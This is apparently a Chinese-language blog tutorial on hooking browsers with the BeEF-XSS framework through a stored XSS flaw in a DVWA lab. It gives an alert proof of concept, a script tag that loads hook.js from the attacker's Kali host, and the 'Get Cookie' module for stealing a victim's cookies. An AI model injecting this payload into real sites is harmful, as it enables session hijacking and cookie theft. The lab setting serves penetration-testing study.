BeEF-XSS渗透框架的使用
目录
BeEF-XSS渗透框架的使用
搭建靶场
将DVWA靶场安装包解压到根目录
修改配置文件
BeEF-XSS渗透框架的使用【KALI】
安装BeEF:sudo apt-get install beef-xss
运行BeEF:beef-xss
ifconfig
查看KALI机的IP
在真机上访问BeEF的Web UI: http://192.168.1.130:3000/ui/panel
在真机上访问BeEF要把环回地址127.0.0.1改成KALI机的IP
BeEF的默认用户名密码为beef、beef
首次登录会要求改密码,若改完的密码忘了可以通过
vim /etc/beef-xss/config.yaml
查看或修改
BeEF实战
首先设置DVWA靶场的难度
来到XSS (Stored)——存储型XSS关卡
在留言板Name那栏输入poc:<script>alert(1)</script>
,发现字符数超过上限
解决方法:F12
打开开发者模式
将限制的数量改大些
改好后输入poc
页面出现弹窗,说明存在XSS漏洞
之后刷新页面,还是出现弹窗,说明属于存储型XSS
已经用poc确定存储型XSS存在,接下来就是利用BeEF渗透测试框架来利用这个漏洞
在留言板Name那栏输入payload:<script src="http://192.168.1.130:3000/hook.js"></script>
(记得先通过开发者模式修改字符数限制)
当我们访问这个界面时恶意脚本就被执行了
去BeEF的Web UI,发现真机已经在"上线"列表中了
打开命令界面
- 绿色:对目标主机生效并且不可见(不会被发现)
- 橙色:对目标主机生效但可能可见(可能被发现)
- 灰色:在目标主机上的效果有待验证
- 红色:对目标主机不生效
例如"Get Cookie"模块
获得受害者在那个被利用了XSS漏洞网站的Cookie
当我站在传授他人的角度思考问题时
才能真正领悟并融会贯通
博客受益者是未来那个遗忘某个技术的自己